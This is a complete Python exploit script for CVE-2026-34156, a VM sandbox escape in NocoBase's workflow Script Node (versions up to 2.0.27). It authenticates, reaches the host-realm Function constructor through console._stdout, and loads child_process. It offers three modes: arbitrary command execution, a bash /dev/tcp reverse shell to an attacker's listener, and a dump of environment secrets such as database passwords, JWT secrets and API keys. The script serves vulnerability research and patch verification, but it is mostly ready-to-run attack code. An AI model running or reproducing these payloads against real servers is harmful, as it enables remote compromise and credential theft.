# Exploit Title: NocoBase 2.0.27 - VM Sandbox Escape
# Date: 2026-03-26
# Exploit Author: Onurcan Genç
# Vendor Homepage: https://www.nocobase.com/
# Software Link: https://github.com/nocobase/nocobase
# Version: <= 2.0.27 — patched in 2.0.28
# Tested on: Debian GNU/Linux 12 (bookworm) / Docker / Node.js v20.20.1
# CVE: CVE-2026-34156
# Advisory: https://github.com/nocobase/nocobase/security/advisories/GHSA-px3p-vgh9-m57c
# CWE: CWE-913
# CVSS: 9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
#
# Description:
# NocoBase's Workflow Script Node executes user-supplied JavaScript inside
# a Node.js vm sandbox with a custom require allowlist. However, the console
# object passed into the sandbox exposes host-realm WritableWorkerStdio
# stream objects (console._stdout / console._stderr). By traversing the
# prototype chain (.constructor.constructor), an attacker obtains the host
# realm's Function constructor, accesses the process object, and uses
# process.mainModule.require to load child_process — bypassing the sandbox
# and achieving Remote Code Execution as root.
#
# Exploitation chain:
# console._stdout.constructor.constructor → host-realm Function
# Function('return process')() → Node.js process object
# process.mainModule.require('child_process') → unrestricted module
# child_process.execSync('id') → RCE as root
#
# Usage:
# python3 exploit.py -t <TARGET> -u <USER> -P <PASS> --cmd "id"
# python3 exploit.py -t <TARGET> -u <USER> -P <PASS> --dump
# python3 exploit.py -t <TARGET> -u <USER> -P <PASS> -l <LHOST> -p <LPORT>
#
# Notes:
# - Requires valid credentials (any user with workflow access)
# - Vulnerability check runs automatically before exploitation
# - Default reverse shell uses bash /dev/tcp (Debian-based containers)
# - Start listener before running: nc -lvnp 4444
import argparse
import json
import requests
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# ─── Colors ───────────────────────────────────────────────────────────────────
class C:
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
MAGENTA = "\033[95m"
CYAN = "\033[96m"
WHITE = "\033[97m"
BOLD = "\033[1m"
DIM = "\033[2m"
RESET = "\033[0m"
def info(msg): print(f" {C.BLUE}[*]{C.RESET} {msg}")
def good(msg): print(f" {C.GREEN}[+]{C.RESET} {msg}")
def warn(msg): print(f" {C.YELLOW}[!]{C.RESET} {msg}")
def fail(msg): print(f" {C.RED}[-]{C.RESET} {msg}")
def result(msg): print(f" {C.CYAN}[→]{C.RESET} {msg}")
BANNER = f"""
{C.RED}{C.BOLD}╔══════════════════════════════════════════════════════════════════╗
║ NocoBase Workflow Script Node — VM Sandbox Escape to RCE ║
║ CVE: [CVE-2026-34156] | CVSS: 9.9 Critical ║
║ Author: Onurcan Genç ║
╚══════════════════════════════════════════════════════════════════╝{C.RESET}
"""
ESCAPE_CHAIN = (
"const Fn=console._stdout.constructor.constructor;"
"const proc=Fn('return process')();"
"const cp=proc.mainModule.require('child_process');"
)
# ─── Core Functions ───────────────────────────────────────────────────────────
def authenticate(target: str, username: str, password: str, verify_ssl: bool = False) -> str:
url = f"{target.rstrip('/')}/api/auth:signIn"
body = {"account": username, "password": password}
print()
info(f"Authenticating as {C.BOLD}{username}{C.RESET}...")
try:
resp = requests.post(url, headers={"Content-Type": "application/json"},
json=body, timeout=10, verify=verify_ssl)
data = resp.json()
except requests.exceptions.ConnectionError:
fail(f"Connection failed: cannot reach {C.YELLOW}{url}{C.RESET}")
sys.exit(1)
except json.JSONDecodeError:
fail(f"Invalid response from server")
sys.exit(1)
if "errors" in data:
msg = data["errors"][0].get("message", "Unknown error")
fail(f"Authentication failed: {C.RED}{msg}{C.RESET}")
sys.exit(1)
token = data.get("data", {}).get("token")
if not token:
fail("No token in response")
sys.exit(1)
nickname = data.get("data", {}).get("user", {}).get("nickname", "unknown")
user_id = data.get("data", {}).get("user", {}).get("id", "?")
good(f"Authenticated! User: {C.GREEN}{C.BOLD}{nickname}{C.RESET} (ID: {user_id})")
good(f"Token: {C.DIM}{token[:25]}...{token[-10:]}{C.RESET}")
return token
def send_payload(target: str, token: str, payload: str, verify_ssl: bool = False) -> dict:
url = f"{target.rstrip('/')}/api/flow_nodes:test"
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
}
body = {
"type": "script",
"config": {"content": payload, "timeout": 5000, "arguments": []}
}
try:
resp = requests.post(url, headers=headers, json=body, timeout=10, verify=verify_ssl)
return resp.json()
except requests.exceptions.Timeout:
return {"data": {"status": 1, "result": "timeout (expected for reverse shell)"}}
except requests.exceptions.ConnectionError as e:
return {"error": f"Connection failed: {e}"}
except json.JSONDecodeError:
return {"error": "Invalid JSON response", "raw": resp.text[:500]}
def verify_vulnerability(target: str, token: str) -> bool:
print()
print(f" {C.MAGENTA}{'─' * 55}{C.RESET}")
info(f"{C.BOLD}Phase 1: Vulnerability Check{C.RESET}")
print(f" {C.MAGENTA}{'─' * 55}{C.RESET}")
check_payload = (
"try {"
" const name = console._stdout.constructor.name;"
" const fnType = typeof console._stdout.constructor.constructor;"
" return JSON.stringify({stream: name, fnConstructor: fnType});"
"} catch(e) { return 'ERR: ' + e.message; }"
)
result_data = send_payload(target, token, check_payload)
if "error" in result_data:
fail(f"Connection error: {result_data['error']}")
return False
data = result_data.get("data", {})
if data.get("status") != 1:
if "INVALID_TOKEN" in str(data) or "EMPTY_TOKEN" in str(data):
fail("Authentication token is invalid or expired")
else:
fail(f"Unexpected response: {data}")
return False
try:
check = json.loads(data.get("result", "{}"))
stream = check.get("stream", "")
fn_type = check.get("fnConstructor", "")
if stream == "WritableWorkerStdio" and fn_type == "function":
good(f"Host-realm stream object: {C.GREEN}{C.BOLD}{stream}{C.RESET}")
good(f"Function constructor: {C.GREEN}{C.BOLD}accessible{C.RESET}")
print()
good(f"{C.GREEN}{C.BOLD}TARGET IS VULNERABLE!{C.RESET}")
return True
else:
fail(f"Unexpected sandbox state: stream={stream}, fn={fn_type}")
return False
except (json.JSONDecodeError, TypeError):
res = data.get("result", "")
fail(f"Check failed: {res}")
return False
# ─── Exploit Modes ────────────────────────────────────────────────────────────
def exploit_cmd(target: str, token: str, cmd: str):
print()
print(f" {C.MAGENTA}{'─' * 55}{C.RESET}")
info(f"{C.BOLD}Phase 2: Command Execution{C.RESET}")
print(f" {C.MAGENTA}{'─' * 55}{C.RESET}")
info(f"Executing: {C.YELLOW}{cmd}{C.RESET}")
safe_cmd = cmd.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
payload = f'{ESCAPE_CHAIN}return cp.execSync("{safe_cmd}").toString().trim();'
resp = send_payload(target, token, payload)
data = resp.get("data", {})
if data.get("status") == 1:
output = data.get("result", "")
print()
good(f"Output:")
print(f" {C.CYAN}{'─' * 55}{C.RESET}")
for line in output.split("\n"):
print(f" {C.WHITE}{line}{C.RESET}")
print(f" {C.CYAN}{'─' * 55}{C.RESET}")
else:
fail(f"Execution failed: {data}")
def exploit_revshell(target: str, token: str, lhost: str, lport: int):
print()
print(f" {C.MAGENTA}{'─' * 55}{C.RESET}")
info(f"{C.BOLD}Phase 2: Reverse Shell{C.RESET}")
print(f" {C.MAGENTA}{'─' * 55}{C.RESET}")
info(f"Target: {C.YELLOW}{target}{C.RESET}")
info(f"Callback: {C.GREEN}{C.BOLD}{lhost}:{lport}{C.RESET}")
warn(f"Ensure listener is running: {C.BOLD}nc -lvnp {lport}{C.RESET}")
print()
shell_cmd = f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"'
payload = f"{ESCAPE_CHAIN}cp.exec('{shell_cmd}');return 'shell spawned';"
resp = send_payload(target, token, payload)
data = resp.get("data", {})
res = data.get("result", "")
if "shell spawned" in str(res) or "timeout" in str(res):
good(f"{C.GREEN}{C.BOLD}Payload delivered! Check your listener.{C.RESET}")
else:
fail(f"Unexpected response: {data}")
def exploit_dump(target: str, token: str):
print()
print(f" {C.MAGENTA}{'─' * 55}{C.RESET}")
info(f"{C.BOLD}Phase 2: System & Credential Dump{C.RESET}")
print(f" {C.MAGENTA}{'─' * 55}{C.RESET}")
# System info via shell commands
commands = [
("User", "id"),
("Hostname", "hostname"),
("OS", "cat /etc/os-release | grep PRETTY_NAME | cut -d= -f2"),
("Kernel", "uname -r"),
("Node.js", "node --version"),
("Working Dir", "pwd"),
]
print()
info(f"{C.BOLD}System Information{C.RESET}")
print(f" {C.CYAN}{'─' * 55}{C.RESET}")
for label, cmd in commands:
safe_cmd = cmd.replace('"', '\\"')
payload = f'{ESCAPE_CHAIN}return cp.execSync("{safe_cmd}").toString().trim();'
resp = send_payload(target, token, payload)
data = resp.get("data", {})
if data.get("status") == 1:
out = data.get("result", "N/A").replace('"', '')
print(f" {C.WHITE}{label:.<22}{C.RESET} {C.GREEN}{out}{C.RESET}")
print(f" {C.CYAN}{'─' * 55}{C.RESET}")
# Credentials via JavaScript
print()
info(f"{C.BOLD}Environment Credentials{C.RESET}")
print(f" {C.CYAN}{'─' * 55}{C.RESET}")
secrets_payload = (
f"{ESCAPE_CHAIN}"
"const env = proc.env;"
"const keys = ['DB_HOST','DB_PORT','DB_DATABASE','DB_USER','DB_PASSWORD',"
"'DB_DIALECT','INIT_ROOT_USERNAME','INIT_ROOT_PASSWORD','INIT_ROOT_NICKNAME',"
"'INIT_ROOT_EMAIL','APP_KEY','API_KEY','JWT_SECRET','SECRET_KEY'];"
"const out = {}; keys.forEach(k => { if(env[k]) out[k] = env[k]; });"
"return JSON.stringify(out);"
)
resp = send_payload(target, token, secrets_payload)
data = resp.get("data", {})
if data.get("status") == 1:
try:
creds = json.loads(data.get("result", "{}"))
for k, v in creds.items():
color = C.RED if "PASS" in k or "SECRET" in k or "KEY" in k else C.YELLOW
print(f" {C.WHITE}{k:.<30}{C.RESET} {color}{C.BOLD}{v}{C.RESET}")
except json.JSONDecodeError:
result(f"Raw: {data.get('result')}")
print(f" {C.CYAN}{'─' * 55}{C.RESET}")
# All env vars with sensitive patterns
print()
info(f"{C.BOLD}Additional Secrets (pattern match){C.RESET}")
print(f" {C.CYAN}{'─' * 55}{C.RESET}")
extra_payload = (
f"{ESCAPE_CHAIN}"
"const env = proc.env;"
"const out = {};"
"for (const k of Object.keys(env)) {"
" if (/secret|key|token|pass|auth|jwt|api_key|private/i.test(k) && "
" !k.startsWith('npm_')) out[k] = env[k];"
"}"
"return JSON.stringify(out);"
)
resp = send_payload(target, token, extra_payload)
data = resp.get("data", {})
if data.get("status") == 1:
try:
extras = json.loads(data.get("result", "{}"))
if extras:
for k, v in extras.items():
print(f" {C.WHITE}{k:.<30}{C.RESET} {C.RED}{C.BOLD}{v}{C.RESET}")
else:
info("No additional secrets found")
except json.JSONDecodeError:
pass
print(f" {C.CYAN}{'─' * 55}{C.RESET}")
# ─── Main ─────────────────────────────────────────────────────────────────────
def main():
print(BANNER)
parser = argparse.ArgumentParser(
description="NocoBase Workflow Script Node — VM Sandbox Escape to RCE",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=f"""
{C.BOLD}Examples:{C.RESET}
{C.CYAN}Command:{C.RESET} %(prog)s -t http://target:13000 -u nocobase -P admin123 --cmd "id"
{C.CYAN}Dump:{C.RESET} %(prog)s -t http://target:13000 -u nocobase -P admin123 --dump
{C.CYAN}Reverse Shell:{C.RESET} %(prog)s -t http://target:13000 -u nocobase -P admin123 -l 10.10.14.5 -p 4444
"""
)
parser.add_argument("-t", "--target", required=True,
help="Target NocoBase URL (e.g., http://target:13000)")
parser.add_argument("-u", "--username", required=True,
help="NocoBase username")
parser.add_argument("-P", "--password", required=True,
help="NocoBase password")
parser.add_argument("-l", "--lhost", default=None,
help="Listener IP for reverse shell")
parser.add_argument("-p", "--lport", type=int, default=4444,
help="Listener port (default: 4444)")
parser.add_argument("--cmd", default=None,
help="Execute a single command")
parser.add_argument("--dump", action="store_true",
help="Dump system info and credentials")
parser.add_argument("--no-verify", action="store_true",
help="Skip vulnerability verification")
args = parser.parse_args()
if not args.cmd and not args.lhost and not args.dump:
fail(f"Specify {C.BOLD}--cmd{C.RESET} (command), {C.BOLD}--dump{C.RESET} (info), or {C.BOLD}-l LHOST{C.RESET} (revshell)")
sys.exit(1)
# Phase 0: Authenticate
token = authenticate(args.target, args.username, args.password)
# Phase 1: Vulnerability check (always runs unless --no-verify)
if not args.no_verify:
if not verify_vulnerability(args.target, token):
fail(f"{C.RED}{C.BOLD}TARGET IS NOT VULNERABLE.{C.RESET} Exiting.")
sys.exit(1)
# Phase 2: Exploit
if args.dump:
exploit_dump(args.target, token)
elif args.cmd:
exploit_cmd(args.target, token, args.cmd)
else:
exploit_revshell(args.target, token, args.lhost, args.lport)
print()
print(f" {C.GREEN}{C.BOLD}Done.{C.RESET}")
print()
if __name__ == "__main__":
main()